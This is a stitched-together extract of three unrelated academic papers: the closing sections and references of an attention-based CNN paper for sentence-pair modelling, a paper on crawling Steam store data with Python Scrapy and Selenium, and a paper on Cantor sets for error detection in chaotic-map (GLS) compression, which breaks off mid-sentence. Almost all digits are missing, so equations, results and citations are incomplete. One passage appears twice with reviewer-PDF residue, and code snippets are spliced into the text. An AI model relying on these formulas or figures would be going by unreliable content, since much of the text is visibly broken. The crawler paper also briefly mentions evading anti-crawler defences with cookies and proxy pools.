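    # number of cross-sentence token pairs listed as synonyms
    # (`synonyms`: dict token -> set of synonyms, assumed to be built from wordnet)
    return sum(1 for a in tokens1 for b in tokens2 if b in synonyms.get(a, ()))

def length_features(orig_pair, nonover_pair):
    # sentence lengths on the original pair and on its nonover version
    (o1, o2), (n1, n2) = orig_pair, nonover_pair
    return len(o1), len(o2), len(n1), len(n2)
```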
more interestingly, looking at the bottom right corner, both “on it” and “it” in s match “building” in s ; this indicates that abcnns are able to detect some coreference across sentences. “building” in s has two places in which higher attentions appear, one is with “it” in s , the other is with “the building that” in s . this may indicate that abcnns recog- nize that “building” in s and “the building that” / “it” in s refer to the same object. hence, corefer- ence resolution across sentences as well as within a sentence both are detected. for the attention vectors on the left and the top, we can see that attention has focused on the key parts: “people are walking out- side the building that” in s , “several people are in” and “of a colorful building” in s . rows/columns of the attention matrix in figure (bottom, second layer of convolution) correspond to phrases of length since filter width w = in both convolution layers ( = + ∗ ( − )). we use “. . .” to denote words in the middle if a phrase like “several...front” has more than two words. we can see that attention distribution in the matrix has focused on some local regions. as granularity of phrases is larger, it makes sense that the attention values are smoother. but we still can find some interesting clues: at the two ends of the main di- agonal, higher attentions hint that the first part of s matches well with the first part of s ; “several murals on it” in s matches well with “of a color- ful building” in s , which satisfies the intuition that these two phrases are crucial for making a decision on te in this case. this again shows the potential strength of our system in figuring out which parts of the two sentences refer to the same object. in ad- dition, in the central part of the matrix, we can see that the long phrase “people are walking outside the building” in s matches well with the long phrase “are in front of a colorful building” in s . summary we presented three mechanisms to integrate atten- tion into cnns for general sentence pair modeling tasks. our experiments on as, pi and te show that attention-based cnns perform better than cnns without attention mechanisms. the abcnn- gen- erally outperforms the abcnn- and the abcnn- surpasses both. in all tasks, we did not find any big improvement of two layers of convolution over one layer. this is probably due to the limited size of training data. we expect that, as larger training sets become available, deep abcnns will show even better performance. in addition, linguistic features contribute in all three tasks: improvements by . (map) and . (mrr) for as, improvements by . (acc) and . (f ) for pi and an improvement by . (acc) for te. but our abcnns can still reach or surpass state-of-the-art even without those features in as and te tasks. this indicates that abcnns are gen- erally strong nn systems. attention-based lstms are especially successful in tasks with a strong generation component like ma- chine translation (discussed in sec. ). cnns have not been used for this type of task. this is an inter- esting area of future work for attention-based cnns. acknowledgments we gratefully acknowledge the support of deutsche forschungsgemeinschaft (dfg): grant schu / - . we would like to thank the anonymous reviewers for their helpful comments. references jimmy ba, volodymyr mnih, and koray kavukcuoglu. . multiple object recognition with visual atten- tion. in proceedings of iclr. dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . 
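attention maps like the ones analysed here are straightforward to render once the matrix a is available (for instance via the attention_matrix sketch given earlier); the plotting helper below is an illustrative matplotlib sketch, with darker cells indicating higher attention as in the figures.

```python
import matplotlib.pyplot as plt

def plot_attention(A, units_s1, units_s2):
    # rows: units of sentence 1, columns: units of sentence 2; darker = higher attention
    fig, ax = plt.subplots(figsize=(6, 6))
    ax.imshow(A, cmap="Blues")
    ax.set_yticks(range(len(units_s1)))
    ax.set_yticklabels(units_s1)
    ax.set_xticks(range(len(units_s2)))
    ax.set_xticklabels(units_s2, rotation=90)
    fig.tight_layout()
    return fig
```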
neural machine translation by jointly learning to align and translate. in proceedings of iclr. matthew w. bilotti, paul ogilvie, jamie callan, and eric nyberg. . structured retrieval for question an- swering. in proceedings of sigir, pages – . william blacoe and mirella lapata. . a comparison of vector-based representations for semantic composi- tion. in proceedings of emnlp-conll, pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. a. a large anno- tated corpus for learning natural language inference. in proceedings of emnlp, pages – . samuel r. bowman, christopher potts, and christo- pher d. manning. b. recursive neural networks can learn logical semantics. in proceedings of cvsc workshop, pages – . jane bromley, james w. bentz, léon bottou, isabelle guyon, yann lecun, cliff moore, eduard säckinger, and roopak shah. . signature verification us- ing a “siamese” time delay neural network. ijprai, ( ): – . chunshui cao, xianming liu, yi yang, yinan yu, jiang wang, zilei wang, yongzhen huang, liang wang, chang huang, wei xu, deva ramanan, and thomas s. huang. . look and think twice: cap- turing top-down visual attention with feedback con- volutional neural networks. in proceedings of iccv, pages – . ming-wei chang, dan goldwasser, dan roth, and vivek srikumar. . discriminative learning over con- strained latent representations. in proceedings of naacl-hlt, pages – . kan chen, jiang wang, liang-chieh chen, haoyuan gao, wei xu, and ram nevatia. . abc-cnn: an attention based convolutional neural network for visual question answering. corr, abs/ . . jan chorowski, dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . end-to-end continuous speech recognition using attention-based recurrent nn: first results. in proceedings of deep learning and repre- sentation learning workshop, nips. jan chorowski, dzmitry bahdanau, dmitriy serdyuk, kyunghyun cho, and yoshua bengio. . attention-based models for speech recognition. in proceedings of nips, pages – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of coling, pages – . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. jmlr, : – . minwei feng, bing xiang, michael r. glass, lidan wang, and bowen zhou. . applying deep learn- ing to answer selection: a study and an open task. in proceedings of ieee asru workshop, pages – . karol gregor, ivo danihelka, alex graves, danilo jimenez rezende, and daan wierstra. . draw: a recurrent neural network for image generation. in proceedings of icml, pages – . hua he, kevin gimpel, and jimmy j. lin. . multi- perspective sentence similarity modeling with convo- lutional neural networks. in proceedings of emnlp, pages – . michael heilman and noah a. smith. . tree edit models for recognizing textual entailments, para- phrases, and answers to questions. in proceedings of naacl-hlt, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . seunghoon hong, junhyuk oh, honglak lee, and bo- hyung han. . learning transferrable knowl- edge for semantic segmentation with deep convolu- tional neural network. in proceedings of cvpr. baotian hu, zhengdong lu, hang li, and qingcai chen. . convolutional neural network architectures for matching natural language sentences. in proceedings of nips, pages – . yangfeng ji and jacob eisenstein. . 
discriminative improvements to distributional sentence similarity. in proceedings of emnlp, pages – . sergio jimenez, george dueñas, julia baquero, and alexander gelbukh. . unal-nlp: combining soft cardinality features for semantic textual similar- ity, relatedness and entailment. in proceedings of se- meval, pages – . nal kalchbrenner, edward grefenstette, and phil blun- som. . a convolutional neural network for mod- elling sentences. in proceedings of acl, pages – . yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of emnlp, pages – . alice lai and julia hockenmaier. . illinois-lh: a denotational and distributional approach to semantics. in proceedings of semeval, pages – . yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. in proceedings of the ieee, pages – . jiwei li, minh-thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of acl, pages – . chin-yew lin. . rouge: a package for automatic evaluation of summaries. in proceedings of the acl text summarization workshop. thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of emnlp, pages – . nitin madnani, joel tetreault, and martin chodorow. . re-examining machine translation metrics for paraphrase identification. in proceedings of naacl- hlt, pages – . marco marelli, luisa bentivogli, marco baroni, raf- faella bernardi, stefano menini, and roberto zampar- elli. a. semeval- task : evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. in proceedings of semeval, pages – . marco marelli, stefano menini, marco baroni, luisa bentivogli, raffaella bernardi, and roberto zampar- elli. b. a sick cure for the evaluation of com- positional distributional semantic models. in proceed- ings of lrec, pages – . tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in proceedings of nips, pages – . george a. miller. . wordnet: a lexical database for english. commun. acm, ( ): – . volodymyr mnih, nicolas heess, alex graves, and ko- ray kavukcuoglu. . recurrent models of visual attention. in proceedings of nips, pages – . dan moldovan, christine clark, sanda harabagiu, and daniel hodges. . cogex: a semantically and contextually enriched logic prover for question an- swering. journal of applied logic, ( ): – . vasin punyakanok, dan roth, and wen-tau yih. . mapping dependencies trees: an application to ques- tion answering. in proceedings of ai&math (special session: intelligent text processing). tim rocktäschel, edward grefenstette, karl moritz her- mann, tomáš kočiskỳ, and phil blunsom. . rea- soning about entailment with neural attention. in pro- ceedings of iclr. alexander m. rush, sumit chopra, and jason weston. . a neural attention model for abstractive sen- tence summarization. in proceedings of emnlp, pages – . dan shen and mirella lapata. . using semantic roles to improve question answering. in proceedings of emnlp-conll, pages – . richard socher, eric h. huang, jeffrey pennington, an- drew y. ng, and christopher d. manning. . dy- namic pooling and unfolding recursive autoencoders for paraphrase detection. in proceedings of nips, pages – . ming tan, bing xiang, and bowen zhou. . 
lstm- based deep learning models for non-factoid answer se- lection. in proceedings of iclr workshop. shengxian wan, yanyan lan, jiafeng guo, jun xu, liang pang, and xueqi cheng. . a deep architecture for semantic matching with multiple positional sentence representations. in proceedings of aaai, pages – . mengqiu wang, noah a. smith, and teruko mitamura. . what is the jeopardy model? a quasi- synchronous grammar for qa. in proceedings of emnlp-conll, pages – . tianjun xiao, yichong xu, kuiyuan yang, jiaxing zhang, yuxin peng, and zheng zhang. . the application of two-level attention models in deep con- volutional neural network for fine-grained image clas- sification. in proceedings of cvpr, pages – . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron c. courville, ruslan salakhutdinov, richard s. zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual at- tention. in proceedings of icml, pages – . yi yang, wen-tau yih, and christopher meek. . wikiqa: a challenge dataset for open-domain ques- tion answering. in proceedings of emnlp, pages – . xuchen yao, benjamin van durme, chris callison- burch, and peter clark. a. semi-markov phrase- based monolingual alignment. in proceedings of emnlp, pages – . xuchen yao, benjamin van durme, and peter clark. b. automatic coupling of answer extraction and information retrieval. in proceedings of acl, pages – . wen-tau yih, ming-wei chang, christopher meek, and andrzej pastusiak. . question answering using enhanced lexical semantic models. in proceedings of acl, pages – . wenpeng yin and hinrich schütze. a. convolu- tional neural network for paraphrase identification. in proceedings of naacl-hlt, pages – . wenpeng yin and hinrich schütze. b. multi- grancnn: an architecture for general matching of text chunks on multiple levels of granularity. in pro- ceedings of acl-ijcnlp, pages – . lei yu, karl moritz hermann, phil blunsom, and stephen pulman. . deep learning for answer sen- tence selection. in proceedings of deep learning and representation learning workshop, nips. jiang zhao, tiantian zhu, and man lan. . ecnu: one stone two birds: ensemble of heterogenous mea- sures for semantic relatedness and textual entailment. in proceedings of semeval, pages – . introduction related work bcnn: basic bi-cnn abcnn: attention-based bcnn experiments answer selection paraphrase identification textual entailment summary international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - application research of crawler and data analysis based on python wu hejing east university of heilongjiang heilongjiang, e-mail: @qq.com, liu fang east university of heilongjiang heilongjiang, ) zhao long east university of heilongjiang heilongjiang, shao yabin east university of heilongjiang heilongjiang, cui ran east university of heilongjiang heilongjiang, abstract—combined with the actual situation, this paper explores how to develop a crawler method based on the specific framework for the complete interface of steam manufacturers and stores, which should be able to automatically and efficiently crawl the data of specific targets, analyze the dynamic pages, and complete the data cleaning, downloading, saving and other operations, explore the methods of general data analysis, and analyze the downloaded data, extract useful information from it, analyze and summarize the specific crawler method and data analysis method through practical application. keywords-python; scrapy; selenium; beautifulsoup i. 
introduction the st century is a book written by information. with the rapid development of information technology, today's society has become a huge information polymer, and there are various kinds of data in this huge polymer. data is a kind of embodiment of information. in this era of information explosion, how to efficiently find the data we want from all kinds of miscellaneous data and extract them from the network in batches has become a key problem. however, sometimes the unprocessed data itself may be confusing for people. how to process the huge and complex data obtained through what kind of technical means, and finally become an intuitive number, or trend, and become the information that people can obtain intuitively is also a very important topic to be studied in this data age. ii. statistical investigation on the preference sales volume in this project, the american steam online game platform mall is selected as the research object of the crawler. by setting a specific game company as a search keyword in steam's online mall, the data of all works of the company in steam mall are crawled, and the useful information is extracted by analyzing the basic data of each manufacturer's preference for game production type, series sales volume, and praise in addition, the game manufacturers are comprehensively scored and evaluated. international journal of advanced network, monitoring and controls volume , no. , iii. relevant technology and framework this project will use the scrapy framework based on python language to crawl steam website. python as a language has the advantages of lightweight, simplicity, wide range of application and so on. at present, various crawler frameworks and application libraries based on python have been very mature, among which the crawler framework is very popular in the application of general web crawlers. its first version was released in , and now it is quite mature as a crawler framework. the basicprinciple of the scrapy framework is shown in figure . figure . basic principles of scrapy frame iv. design of crawler a. general design idea the process of crawler itself is actually to simulate the user's operation on the browser with a program. first of all, the starting point and range of crawling need to be specified. as the target of crawling is for manufacturers and their works, the interface of manufacturers is taken as the starting point. for example, the page of paradox, a manufacturer, first analyzes the entire manufacturer's page, and finds that the page links and information of all games or game related dlc downloads of the manufacturer are stored in the recommendation div framework of each sub recommendation of recommendations rows, as shown in figure b. design and implementation of reptile functions the crawler architecture is composed of items, spiders, piplings and middleware. among them, items are mainly used to define the items to be crawled, spiders are responsible for defining the whole process of crawling, what means to crawl, pipes are responsible for the basic operations such as data cleaning and saving, middleware can be responsible for the bridge service of scratch and other plug-ins or architectures. responses requests scheduler spiders item pipeline downloader internet scrapyengine spider middlewares downloader middlewares item international journal of advanced network, monitoring and controls volume , no. , figure . 
investigation of html page structure of steam manufacturers by using viewers first, the items to be crawled are defined in the items file. finally, these items may be submitted to the analysis part for data analysis. the specific design and implementation code is: import scrapy class steamdevitem(scrapy.item): # define the fields for your item here like: # name = scrapy.field() qry_nam = scrapy.field() if_dev = scrapy.field() pub_sum = scrapy.field() pub_gam_sum = scrapy.field() pub_dlc_sum = scrapy.field() dev_nam = scrapy.field() pub_nam = scrapy.field() gam_title = scrapy.field() res_date = scrapy.field() gam_type = scrapy.field() gam_tag = scrapy.field() if_muti = scrapy.field() gam_score = scrapy.field() gam_score_sum = scrapy.field() gam_score_ratio = scrapy.field() pass c. spider design the design of spider is the key point of this project. whether the initial dynamic page connection or the last static page information crawling mode will be defined international journal of advanced network, monitoring and controls volume , no. , in this file. in this project, spider will be named steam, and some key implementation codes will be pasted here, with running results and some notes attached. first, introduce start_ the design method of dynamic page crawling of selenium in requests method: chrome_opt = webdriver.chromeoptions() prefs = { "profile.managed_default_content_settings.images": , 'permissions.default.stylesheet': } chrome_opt.add_experimental_option("prefs", prefs) browser = webdriver.chrome(options=chrome_opt) browser.get("https://store.steampowered.com/" + qry_sta + "/" + qry_target) bs = beautifulsoup(browser.page_source, 'html.parser') #beautiful soup the specific store connections of each product exist in the a anchor label of each entry, and these connections are read to the defined links using the loop_ in the list list, crawling of the list is completed, but sometimes the text and picture in the entry may contain a tag, and they all point to the same page. if direct application may cause repeated crawling, a loop is used here, and if not in statement is used to de duplicate the list. after using the print statement to verify the function of the module, the verification results are shown in figure . figure . list of urls obtained by selenium and beautiful soup international journal of advanced network, monitoring and controls volume , no. , d. start directional climbing after designing and debugging the spider, run the cmd command window of the system, open the root directory of the crawler file, and input the crawler stream-o steamdev.csv , crawl the target website. input - o steamdev.csv the purpose is to let the crawler save the last crawled data in the form of csv table. the saved data appears in the project root. see figure for the climbing process. figure . executing the start request method selenium pop-up browser to crawl the dynamic page v. data analysis next, we will perform basic visual operations on the crawled data in the form of operation tables. in the crawler project, we crawled for the paradox interactive publisher. the crawled data is presented in the form of csv tables, as shown in figure . 
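before turning to the charts, the same kind of tabulation can be done directly in python with pandas. the sketch below is illustrative only: the column names come from the items definition given earlier, but whether they load as clean numeric values depends on the crawled data, so the numeric columns are coerced defensively.

import pandas as pd

# load the table produced by "scrapy crawl steam -o steamdev.csv"
df = pd.read_csv('steamdev.csv')

print(len(df), 'products crawled')
print(df['gam_type'].value_counts())    # which game types the publisher prefers

# review counts and the favourable-review ratio may arrive as text (e.g. "95%"), so coerce them
reviews = pd.to_numeric(df['gam_score_sum'], errors='coerce')
ratio = pd.to_numeric(df['gam_score_ratio'].astype(str).str.rstrip('%'), errors='coerce')
print(reviews.mean())                   # average number of reviews per product
print(ratio.mean())                     # average share of favourable reviews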
through the use of spreadsheets and further collation of the crawled data, the following data are obtained: the publisher has published works in steam platform, of which the majority of dlc has published dlc, most of the games published are single player games, and each game published in its mall has an average of reviews, of which the proportion of favorable reviews is about . %, see the chart below for detailed visual analysis. international journal of advanced network, monitoring and controls volume , no. , figure . crawled data list figure . output the publisher platform follower ranking chart international journal of advanced network, monitoring and controls volume , no. , vi. conclusion through demonstration and part of practice, this paper explores the process of data crawling and basic data analysis of dynamic pages by combining the general python's story framework with selenium + beautiful soup through crawling the steam online game mall website. the crawler has good scalability. for example, if you want to compare the crawling data of multiple game manufacturers, you can write a query manufacturer list to get the product url list from the dynamic web page of the manufacturer list first. in terms of anti-crawler, selenium itself has a very good anti crawler ability. if you want to further anti crawler, you can also expand multiple cookies, and even establish a proxy ip pool. acknowledgment this paper is about the scientific research project of heilongjiang oriental university in , "implementation of crawler based on python scrapy framework", project number hdfky reference [ ] yuhao fan. design and implementation of distributed crawler system based on scrapy[j].iop conference series: earth and environmental science, , ( ): - . [ ] jing wang, yuchun guo. scrapy-based crawling and user-behavior characteristics analysis on taobao[p]. cyber-enabled distributed computing and knowledge discovery (cyberc), international conference on, : - . [ ] ryan mitchell. python web crawler authority guide (second edition) [m]. beijing: people's post and telecommunications press, : - . [ ] wei chengcheng. data information crawler technology based on python [j]. electronic world, ( ): - . [ ] mark.lutz . python learning manual (fifth edition, volume i) [m]. beijing: mechanical industry press, : - . [ ] fan chuanhui. python reptile development and project practice [m]. beijing: mechanical industry press, ( ): - . [ ] song yongsheng, huang rongmei, wang jun. research on python based data analysis and visualization platform [j]. modern information technology: ( ): - . [ ] liu yuke, wang ping. statistics and graph output of student achievement data based on python + pandas + matplotlib [j]. fujian computer. ( ): - . [ ] liu yuke, wang ping. statistics and graph output of student achievement data based on python + pandas + matplotlib [j]. fujian computer. ( ): - . [ ] long hu, yang hui. data analysis and visualization in the context of big data [j]. journal of kaili university. ( ): - . submitted october accepted december published january corresponding author nithin nagaraj, nithin@nias.res.in, nithin.nagaraj@gmail.com academic editor arun somani additional information and declarations can be found on page doi . /peerj-cs. copyright nagaraj distributed under creative commons cc-by . 
open access using cantor sets for error detection nithin nagaraj consciousness studies programme, national institute of advanced studies, bengaluru, india abstract error detection is a fundamental need in most computer networks and communication systems in order to combat the effect of noise. error detection techniques have also been incorporated with lossless data compression algorithms for transmission across communication networks. in this paper, we propose to incorporate a novel error detection scheme into a shannon optimal lossless data compression algorithm known as generalized luröth series (gls) coding. gls-coding is a generalization of the popular arithmetic coding which is an integral part of the jpeg standard for still image compression. gls-coding encodes the input message as a symbolic sequence on an appropriate d chaotic map generalized luröth series (gls) and the compressed file is obtained asthe initial valueby iterating backwards onthe map. however, in thepresence of noise, even small errors in the compressed file leads to catastrophic decoding errors owing to sensitive dependence on initial values, the hallmark of deterministic chaos. in this paper, we first show that repetition codes, the oldest and the most basic error correction and detection codes in literature, actually lie on a cantor set with a fractal dimension of n, which is also the rate of the code. inspired by this, we incorporate error detection capability to gls-coding by ensuring that the compressed file (initial value on the chaotic map) lies on a cantor set. even a -bit error in the initial value will throw it outside the cantor set, which can be detected while decoding. the rate of the code can be adjusted by the fractal dimension of the cantor set, thereby controlling the error detection performance. subjects autonomous systems, computer networks and communications, data science, mobile and ubiquitous computing, software engineering keywords error detection, error control coding, cantor sets, shannon entropy, arithmetic coding, repetition codes, gls-coding, chaos, lossless data compression introduction computers and communication systems invariably have to deal with the ill effects of noise, which can lead to errors in computation and information processing. in a landmark paper published in , richard hamming addressed this problem by introducing mathematical techniques for error detection and correction (hamming, ). since then, coding theory has burgeoned to be a field of its own right, boasting of important research and developments in the art and science of error detection and correction (lin & costello, ). error detection/correction techniques have therefore been a fundamental part of most computing systems and communication networks, typically applied on the input data after data compression (lossy/lossless) and encryption (bose, ). shannon’s separation theorem (shannon, ) states that under certain assumptions, data compression (source coding) and error protection (channel coding) can be performed how to cite this article nagaraj n. . using cantor sets for error detection. peerj comput. sci. :e http://doi.org/ . /peerj- cs. https://peerj.com mailto:nithin@nias.res.in mailto:nithin.nagaraj@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. http://doi.org/ . /peerj-cs. 
separately and independently (sequentially) while still maintaining optimality. however, in several practical scenarios, these assumptions are not met and hence there is a need for joint source channel coding. in image/video browsing and web-based applications, it is highly desirable to have the property of progressive transmission (said & pearlman, ). (progressive transmission refers to the successive approximation property of the bitstream, where successive bits transmitted across the channel improve the fidelity of reconstruction at the decoder.) however, even the slightest error can wreak havoc on a progressive bitstream. hence, there is a need for incorporating error detection when decoding a compressed progressive bitstream.
lossless data compression refers to the removal of redundancy in the data, a prerequisite step in most storage and communication systems before the application of an encryption algorithm and error control coding (for error detection/correction). consider an i.i.d. binary message source s which emits '0' with probability p (0 < p < 1). a binary message m of length n from such a source needs to be losslessly compressed. shannon (shannon, ) showed that such a message can at best be losslessly compressed to ≥ h(s)·n bits on average, where h(s) is the shannon entropy of the source. for an individual binary message m from such an i.i.d. source, we can compute h(·) as follows:

h(m) = -p log_2(p) - (1 - p) log_2(1 - p) bits/symbol, ( )

where p = (number of zeros in m) / n. there are several lossless compression algorithms in the literature: shannon-fano coding, huffman coding, arithmetic coding, lempel–ziv coding and others (cover & thomas, ; sayood, ). among these, arithmetic coding (rissanen & langdon, ) achieves the shannon entropy limit for increasing message lengths. arithmetic coding is used extensively in several practical applications owing to its speed, efficiency and progressive bitstream property. in fact, it is used in jpeg (taubman & marcellin, ), the international standard for still image compression, replacing the popular huffman coding which was used in the earlier jpeg (wallace, ) standard. in nagaraj, vaidya & bhat ( ), it was shown that arithmetic coding is closely related to a 1d non-linear chaotic dynamical system known as generalized luröth series (gls). specifically, it was shown that lossless compression or encoding of the binary message m can be performed as follows. first, the message m is treated as a symbolic sequence on an appropriately chosen chaotic gls. the initial value on the gls corresponding to this symbolic sequence is computed by iterating backwards on the map. this initial value (written in binary) serves as the compressed file. for decompression, we start with this initial value (the compressed file) and iterate forwards on the (same) gls, and record the symbolic sequence. this symbolic sequence is the decoded m. such a simple lossless compression algorithm (known as gls-coding) was proved to achieve shannon's entropy limit (nagaraj, vaidya & bhat, ). arithmetic coding turns out to be a special case of gls-coding (nagaraj, vaidya & bhat, ). unfortunately, it turns out that gls-coding (hence also arithmetic coding), having the progressive bitstream property, is very sensitive to errors. even a single bit error in the compressed file can lead to catastrophic decoding errors.
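as a side illustration (not part of the original text), the entropy expression above can be evaluated in a few lines of python for any binary string:

import math

def message_entropy(m):
    # empirical shannon entropy (bits/symbol) of a binary message, with p = fraction of zeros
    p = m.count('0') / len(m)
    if p == 0.0 or p == 1.0:
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)

print(message_entropy('00100101'))   # ~0.954 bits/symbol for this toy message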
this sensitivity to errors has been well documented in the data compression literature (boyd et al., ) and researchers have since been trying to enhance arithmetic coding with error detection and correction properties (anand, ramchandran & kozintsev, ; pettijohn, hoffman & sayood, ). in this work, our aim is to incorporate error detection into gls-coding by using a cantor set while not sacrificing much on the lossless compression ratio performance of gls-coding. as we shall demonstrate, the cantor set has desirable properties that enable efficient error detection with gls-decoding. the paper is organized as follows. in 'gls-coding and decoding', we briefly describe gls-coding of a binary message and its sensitivity to errors. in 'error detection using cantor set', we explore the cantor set and describe its wonderful properties that enable error detection. particularly, it is shown that repetition codes belong to a cantor set. inspired by this, we incorporate error detection into gls-coding using a cantor set in 'incorporating error detection into gls-coding using a cantor set' and show simulation results of the proposed method. we conclude with open challenging problems in 'conclusions and future work'.

gls-coding and decoding
in this section, we shall briefly describe gls-coding, first proposed by nagaraj, vaidya & bhat ( ). we are given a message m, of length l, from a binary i.i.d. source s. our aim is to losslessly compress m. to this end, we first determine the probability of zeros in m, denoted by p. we then construct the gls map t_p as follows:

x_{n+1} = t_p(x_n) = x_n / p,             if 0 <= x_n < p,
                     (1 - x_n) / (1 - p), if p <= x_n < 1.

the gls map, also known as the skew-tent map, t_p, has two intervals: [0, p) and [p, 1), which are tagged with the symbols '0' and '1' respectively. (one could alternately use the skew-binary map; there are eight possible modes of gls in this case and all are equivalent in terms of compression ratio performance (nagaraj, vaidya & bhat, ).) starting with any initial value x_0 ∈ [0, 1), the above map t_p can be applied iteratively to yield the real-valued time series {x_i}. the symbolic sequence of this time series, denoted by {s_i}, is simply obtained by:

s_i = 0, if 0 <= x_i < p,
      1, if p <= x_i < 1.

given the symbolic sequence {s_i}, the inverse of t_p is given by:

t_p^{-1}(y_j) = p y_j,            if s_j = 0,
                1 - y_j (1 - p),  if s_j = 1.

for gls-coding, we begin by treating the given message m as a symbolic sequence {s_i}, i = 0, ..., l-1, of length l on the gls t_p. the goal is to obtain the initial value x_0 ∈ [0, 1) which, when iterated forwards on t_p, produces the symbolic sequence {s_i} (= message m). to obtain x_0, we begin by initializing start_0 = 0.0 and end_0 = 1.0. we then determine the inverse images of start_0 and end_0 by iterating backwards on t_p, by using t_p^{-1} and starting with the last symbol s_{l-1}. at the end of the first back-iteration, we obtain start_1 and end_1. we determine the inverse images of start_1 and end_1 (given s_{l-2}) to determine the new interval [start_2, end_2). this is repeated l times to yield the final interval [start_{l-1}, end_{l-1}). all points within this final interval have the same symbolic sequence. (the number of bits needed to store the compressed file x_0 approaches the entropy h asymptotically as the length of the message approaches ∞. arithmetic coding turns out to be using the skewed-binary map instead of the skewed-tent map.) figure . gls-coding: an example.
for the message m = (l = , p = . ), the above figure shows the backward-iteration from to on the gls t . . with [st art ,end ) = [ . , . ) and iterating backwards, we obtain [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ) and so on. in this figure, when we go from the symbols to , we go from [st art ,end ) = [ . , . ) to [st art ,end ) = [ . , . ) since the symbolic sequence at this iteration is . this process is repeated until we have a final interval [st artl− ,endl− ) for the entire m. given the symbolic sequence {si}, the inverse of tp is given by: t − p (y j) = { py j, if s j = , − y j( − p), if s j = , for gls-coding, we begin by treating the given message m as a symbolic sequence {si}i=l− i= of length l on the gls tp. the goal is to obtain the initial value x ∈ [ , ) which when iterated forwards on tp produces the symbolic sequence {si} (= message m). to obtain x , we begin by initializing st art = . and end = . . we then determine the inverse images of st art and end by iterating backwards on tp, by using t − p and starting with the last symbol sl− . at the end of the first back-iteration, we obtain st art and end . we determine the inverse images of st art and end (given sl− ) to determine the new interval [st art ,end ). this is repeated l times to yield the final interval [st artl− ,endl− ). all points within this final interval have the same symbolic sequence (= m = {si}). we take the mid-point x = st artl− +endl− as the compressed file. since x is a real number (between and ), we write its binary representation to the file. the number of bits needed to represent the compressed file x is ⌈−log (endl− − st artl− )⌉ bits. this is proved to be shannon optimal in (nagaraj et al., ) and arithmetic coding is shown to be a special case of gls-coding . gls-decoding is straightforward. at the decoder, given the value of p, we construct the gls (skew- tent map) tp as described earlier. given that we know x (the compressed file ), all that we need to do is iterate forwards on the map tp for l (= length of message m) iterations and output the symbolic sequence {si}. this is the decoded message and in the absence of any noise, this is exactly the same as m which was input to the encoder. as an example, consider m = (l = ). in this case, p = = . and t . is shown in fig. . with st art = . and end = . , we obtain [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ) and so on. . effect of single-bit error on gls-decoding: sensitive dependence on initial value of the map thus far, we have discussed lossless coding in the absence of any kind of noise. however, in practical applications, noise is unavoidable. if the data is in a compressed form, then it is quite likely that the the number of bits needed to store the compressed file x approaches the entropy h asymptotically as the length of the message approaches ∞. arithmetic code turns out to be using the skewed-binary map instead of the skewed-tent map. / peerj comput. sci. reviewing pdf | (cs- : : : : :new dec ) manuscript to be reviewedcomputer science figure gls-coding: an example. for the message m = (l = ,p= . ), the above figure shows the backward-iteration from to on the gls t . . with [start ,end ) = [ . , . ) and iterating backwards, we obtain [start ,end ) = [ . , . ), [start ,end ) = [ . , . ), [start ,end )=[ . , . ) and so on. in this figure, when we go from the symbols to , we go from [start ,end )=[ . , . ) to [start ,end )=[ . , . 
) since the symbolic sequence at this iteration is . this process is repeated until we have a final interval [startl− ,endl− ) for the entire m. full-size doi: . /peerjcs. /fig- (=m ={si}). we take the mid-point x = startl− +endl− as the compressed file. since x is a real number (between and ), we write its binary representation to the file. the number of bits needed to represent the compressed file x is d−log (endl− −startl− )e bits. this is proved to be shannon optimal in nagaraj, vaidya & bhat ( ) and arithmetic coding is shown to be a special case of gls-coding . gls-decoding is straightforward. at the decoder, given the value of p, we construct the gls (skew-tent map) tp as described earlier. given that we know x (the compressed file), all that we need to do is iterate forwards on the map tp for l (= length of message m) iterations and output the symbolic sequence {si}. this is the decoded message and in the absence of any noise, this is exactly the same as m which was input to the encoder. as an example, consider m = (l= ). in this case, p= = . and t . is shown in fig. . with start = . and end = . , we obtain [start ,end )= [ . , . ), [start ,end )=[ . , . ), [start ,end )=[ . , . ) and so on. effect of single-bit error on gls-decoding: sensitive dependence on initial value of the map thus far, we have discussed lossless coding in the absence of any kind of noise. however, in practical applications, noise is unavoidable. if the data is in a compressed form, then it is quite likely that the decoder would be unable to decode or would decode incorrectly. even detecting whether an error has occurred helps in several communication protocols since a repeat request could be initiated. in gls-coding, the compressed file is the initial value of the symbolic sequence (the message m) on the appropriate gls. since gls is a chaotic map, it exhibits sensitive dependence on initial values, the hallmark of deterministic chaos (alligood, sauer & yorke, ). a small perturbation in the initial value will result in a symbolic sequence which nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure . effect of noise on gls-coding: (a) the first bit of the compressed file is flipped. the decoded message is very different from the actual intended message. (b) the middle bit (bit no. ) of the compressed file is flipped. the first bits are decoded without error and the remaining bits show lots of decoding error. ( p = . ,n = , , compressed file size = bits). in both cases, only part of the difference is shown. decoder would be unable to decode or would decode incorrectly. even detecting whether an error has occurred helps in several communication protocols since a 